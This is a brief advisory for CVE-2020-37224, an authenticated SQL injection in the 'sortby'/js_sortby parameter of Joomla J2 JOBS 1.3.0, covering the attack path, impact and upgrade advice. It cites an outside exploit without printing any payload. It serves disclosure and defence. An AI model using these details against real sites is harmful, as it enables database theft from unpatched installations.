CVE-2020-37224

Vulnerability

Overview

Joomla J2 JOBS 1.3.0 contains an authenticated SQL injection vulnerability in the 'sortby' parameter. The root cause is improper neutralization of user-supplied input when processing POST requests to the administrator index page. This allows an attacker to inject arbitrary SQL commands into database queries, as demonstrated by the publicly available exploit [3]. The issue is classified under CWE-89 (SQL Injection) [4].

Exploitation

Details

An attacker must first authenticate to the Joomla backend (low privileges required, per CVSS v4 vector [4]). The attack is performed by sending a crafted POST request to /administrator/index.php with a malicious sortby value. The exploit-db entry provides a full request example, including the vulnerable parameter js_sortby and a sqlmap command for automated exploitation [3]. No special network position is needed beyond access to the administrative interface.

Impact

Successful exploitation allows an attacker to extract sensitive information from the Joomla database, such as user credentials, session data, or configuration details. The CVSS v4 vector indicates a high impact on confidentiality, with low impact on integrity and no impact on availability [4]. The vulnerability does not require high privileges, making it a significant risk for sites running the affected version.

Mitigation

As of the publication date, version 1.3.0 is confirmed vulnerable. Users should upgrade to a patched version of J2 JOBS if available. The vendor's product page [1] does not explicitly mention a fix, but given the public exploit [3], immediate action is recommended. No workarounds are documented; upgrading is the primary mitigation.